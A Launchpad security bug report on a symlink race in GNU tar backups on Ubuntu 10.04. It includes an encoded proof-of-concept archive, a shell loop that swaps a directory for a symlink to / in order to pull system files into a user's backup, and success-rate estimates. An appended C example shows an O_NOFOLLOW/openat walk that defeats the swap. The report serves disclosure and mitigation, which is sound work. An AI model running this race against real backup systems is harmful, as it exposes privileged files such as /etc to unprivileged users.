*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Marc Deslauriers
(mdeslaur):
Binary package hint: tar
Tar does not check modifications of the path during backup (symlinks). A
local user might use that to create arbitrarily large backups or include
arbitrary files at any locations he has write access to, e.g. include a
copy of the real /etc at /home/[username]/root. The user would then need
some social engineering (or the hoster's automated "restore my site" button)
to get the files restored to his home directory.
Tested on:
Description: Ubuntu 10.04 LTS
Release: 10.04
# apt-cache policy tar
tar:
Installed: 1.22-2
Candidate: 1.22-2
Version table:
*** 1.22-2 0
500 http://archive.ubuntu.com/ubuntu/ lucid/main Packages
100 /var/lib/dpkg/status
Base64 tar.bz2 of POC:
QlpoOTFBWSZTWSm2JAcAAUh/xMwwAgB7f/+fL2ffqv/v374QAAABAAhAAxzWSsQFIgUxTCnoT00m
1MyJtCeQjEHqBgAEeiDTBklPCRskyNJpoZGjBBpoDQNDIAGgaDjRkyMIxAMJoMAmg0DJk0ZMhhAY
SJJpqMo8hTZNMmU8jVDZTQGaZT9KaaBpp6NQZP1T8jv9nKcDwLIBJ0ECNGys1ryyCQTRiGgCDwD3
o+WX5g24/Nkq+LRjb7XAndAe72e2yuwXmpfUrpZCMzBlxAUCEATXovesr7aYkfTR4lJdRiwxmElQ
RxxLBWPugjxv8Nu2a8KQ2WJocRS+uVrPPMg1Mr8XPr5ktHgWbIQ5UxF6qu6Dsh1HnOhCkErs7f1g
Y7JyNmHjZhCiJJfeQCLwGQVGAa+KCzLxylXZgJ+sK9f7LhaSlwmyhYad86s+ZP2PVkPtNIteqAX0
n6++AkdEELo76Ypk8JOJEoKvhv7e703nfCr7osUr165LFgoQOkouvV5XWUU4z5+x9ZJORGEUSECM
dMRUq8vAgDIljwCKt45cxhcAbSeRBxAJeAS4cJ6SfarQ4WcUQf0VIuLDxOfejVd+B4iqRmbabktw
xZ/oTzigHWTGHCsaoYMzn9EvIXGKabBVvSETimpK5HbAbIN981yexbt7QWKuOUg/JYi1AQCCvjtH
JzFucGT8wUcjUwpmGU32NIkSCWAJycVDQVi0lFWVSyacCH3hCkPjjfSLkUuIx3JaTg2w2jfkhQNO
TDT5NKg6iqICcPf0FxZNjxM4unGzEGbThiHbcUmzdWkKsoWE9EKKoC4wcnOlYfvJBtfHYUQGJDRn
+Kd3t9yU7+SwWW3U9bxQOEbmiWrDiW5DG2xjDXzbshq+9aZmdMNplpwtPK0wuqJVo6ZHKWJRs5N5
IS5Dzo+XVxjuG0qxYM+mKkFfYSakhFBjOuLtFuDLmryHwRxW9nKYW0biwzItEi7Ph0W5UqF5DAOf
ZskGighYQH2U0hK9balJFLLi8OCo/3VF3RAbl2SEGBe6JPZNjHsiRzIxtcycYoMGXPNSKmVCqURB
o6ZypQSHKzCTRVhMy1pYOU/44GqjU8EgLep3q0YCeS0CdnFy38RAA/xdyRThQkCm2JAc
The attack can also be used without inotify, but chances per modified directory
vary. Still, this allows remote attacks on backups, e.g. from a shared computer
room machine, if e.g. home is mounted via NFS. The files included will then be
from the server where the backup tasks run, most likely the storage server
providing all NFS resources. The same should be possible via sftp access or
malicious servlets. I haven't checked the chances for remote attacks; permanent
local flips show about a 10-20% chance to win with the following algorithm:
mkdir root
# 50 MB zero-filled file whose name is a single space, "root/ "; per the
# reporter its size tunes the timing against tar's read/compress delay
dd if=/dev/zero bs=1M count=50 "of=root/ "
mkdir root/etc
while true; do
    sleep 1
    mv root rootx      # move the real directory aside ...
    ln -s / root       # ... and put a symlink to / in its place
    sleep 1
    rm root            # drop the symlink again
    mv rootx root      # restore the real directory
done
Since a malicious user might use e.g. 30 directories in parallel, it
will give him a 1-(0.9^30) chance to win (more than 95%). The size of the
zero-byte file is important, it interferes with the tar delay (resulting
from disk speed, compression speed). There might be optimization
strategies with different file sizes, that give higher chances with
lower number of files (leave that to the mathematicians).
Some thoughts on that topic:
http://www.halfdog.net/Software/SymlinksAndSecurity.html
Things to do:
* I haven't checked if it is possible to interfere with the proc interface in
that way, e.g. to gain access to kernel memory or other information, although I
guess that it should be possible with more subtle time races, which also allow
changing the permissions of the file in the backup to arbitrary values.
* I haven't checked if the same issue is present during restore. If yes
(as I suspect), and restore is run with root privileges, arbitrary code
execution will follow, e.g. by replacing any system files (e.g. using a
backdoored /bin/sh) or modification of the /proc interface.
** Affects: tar (Ubuntu)
Importance: Undecided
Status: Confirmed
--
Tar allows inclusion of arbitrary files in backup
https://bugs.launchpad.net/bugs/570050
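What an archiver has to do to close the race the report describes, as an added example that is not part of the bug report and is not GNU tar's code: walk the tree by file descriptor, open every component with O_NOFOLLOW so a symlink swapped in for a directory fails with ELOOP instead of being followed, and compare the (st_dev, st_ino) of what was lstat()ed with the (st_dev, st_ino) of what was actually opened, so an object replaced inside the window is rejected rather than copied. The tree under /tmp, the names root, rootx, root/link and root/etc/hosts, and the race_hook_fn seam (which fires the reporter's "mv root rootx; ln -s / root" at the exact point the loop above races) are constructed for this demo; demo_run(0, ...) walks the tree undisturbed, demo_run(1, ...) walks it with the swap fired inside the window.

```c
/* Added example (not GNU tar's code): a symlink-safe walk that defeats the mv/ln -s swap. */
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

struct walk_stats {
    long regular_files;    /* files whose lstat and fstat identities matched */
    long symlinks_skipped; /* symlinks seen; never followed */
    long swapped;          /* objects replaced between lstat() and open(): the race */
    long long bytes;       /* size of accepted files (what would enter the archive) */
};

typedef void (*race_hook_fn)(void *arg);  /* demo seam: runs inside the lstat/open window */

static int same_object(const struct stat *a, const struct stat *b)
{
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* Walk 'name' relative to 'parent'. Every open uses O_NOFOLLOW, so a symlink
 * swapped in for a directory gives ELOOP instead of a walk of "/", and fstat()
 * of the opened fd must match the earlier lstat(), so anything replaced inside
 * the window is counted as swapped and never archived. */
static int walk_dir(int parent, const char *name, struct walk_stats *st,
                    race_hook_fn hook, void *arg)
{
    struct stat before, after, eb, ea; struct dirent *e;
    if (fstatat(parent, name, &before, AT_SYMLINK_NOFOLLOW) != 0) return -1;
    if (S_ISLNK(before.st_mode)) { st->symlinks_skipped++; return 0; }
    if (!S_ISDIR(before.st_mode)) return 0;
    if (hook) hook(arg);                      /* the attacker's turn (demo only) */
    int fd = openat(parent, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) {
        if (errno == ELOOP || errno == ENOTDIR) { st->swapped++; return 0; }
        return -1;
    }
    if (fstat(fd, &after) != 0 || !same_object(&before, &after)) {
        st->swapped++; close(fd); return 0;
    }
    DIR *d = fdopendir(fd);                   /* d owns fd; closedir() closes it */
    if (!d) { close(fd); return -1; }
    while ((e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        if (fstatat(fd, e->d_name, &eb, AT_SYMLINK_NOFOLLOW) != 0) continue;
        if (S_ISLNK(eb.st_mode)) { st->symlinks_skipped++; continue; }
        if (S_ISDIR(eb.st_mode)) { walk_dir(fd, e->d_name, st, NULL, NULL); continue; }
        if (!S_ISREG(eb.st_mode)) continue;
        int ffd = openat(fd, e->d_name, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
        if (ffd < 0) { if (errno == ELOOP) st->swapped++; continue; }
        if (fstat(ffd, &ea) == 0 && S_ISREG(ea.st_mode) && same_object(&eb, &ea)) {
            st->regular_files++;
            st->bytes += ea.st_size;          /* an archiver reads from ffd here, never by path */
        } else st->swapped++;
        close(ffd);
    }
    closedir(d); return 0;
}

/* The reporter's move, fired inside the window: mv root rootx; ln -s / root */
static void swap_in_symlink(void *arg)
{
    int top = *(int *)arg;
    renameat(top, "root", top, "rootx");
    symlinkat("/", top, "root");
}

/* Build the constructed tree <tmp>/root/{etc/hosts, link -> "/"}, walk "root"
 * (race != 0: the swap fires inside the window), fill *st, remove the tree. */
int demo_run(int race, struct walk_stats *st)
{
    char tmp[] = "/tmp/tarrace.XXXXXX";
    if (!mkdtemp(tmp)) return -1;
    int top = open(tmp, O_RDONLY | O_DIRECTORY);
    if (top < 0 || mkdirat(top, "root", 0700) || mkdirat(top, "root/etc", 0700) ||
        symlinkat("/", top, "root/link")) return -1;
    int f = openat(top, "root/etc/hosts", O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (f < 0 || write(f, "127.0.0.1 localhost\n", 20) != 20) return -1;
    close(f); memset(st, 0, sizeof *st);
    int rc = walk_dir(top, "root", st, race ? swap_in_symlink : NULL, &top);
    if (race) { unlinkat(top, "root", 0); renameat(top, "rootx", top, "root"); }
    unlinkat(top, "root/etc/hosts", 0); unlinkat(top, "root/etc", AT_REMOVEDIR);
    unlinkat(top, "root/link", 0); unlinkat(top, "root", AT_REMOVEDIR);
    close(top); rmdir(tmp);
    return rc;
}

int main(void)
{
    struct walk_stats s;
    for (int race = 0; race <= 1 && demo_run(race, &s) == 0; race++)
        printf("race=%d files=%ld symlinks=%ld swapped=%ld bytes=%lld\n", race,
               s.regular_files, s.symlinks_skipped, s.swapped, s.bytes);
    return 0;
}
```

Without the swap the walk accepts one regular file (20 bytes) and skips one symlink; with the swap fired inside the window, openat() returns ELOOP, the directory is reported as swapped and nothing under "/" is read. The point is that once every step operates on the descriptor returned by openat() rather than on a path string, the 10-20% per-directory odds and the 30-directory parallelism from the report no longer matter: the attacker can still flip the directory, but can no longer change what the archiver is reading from.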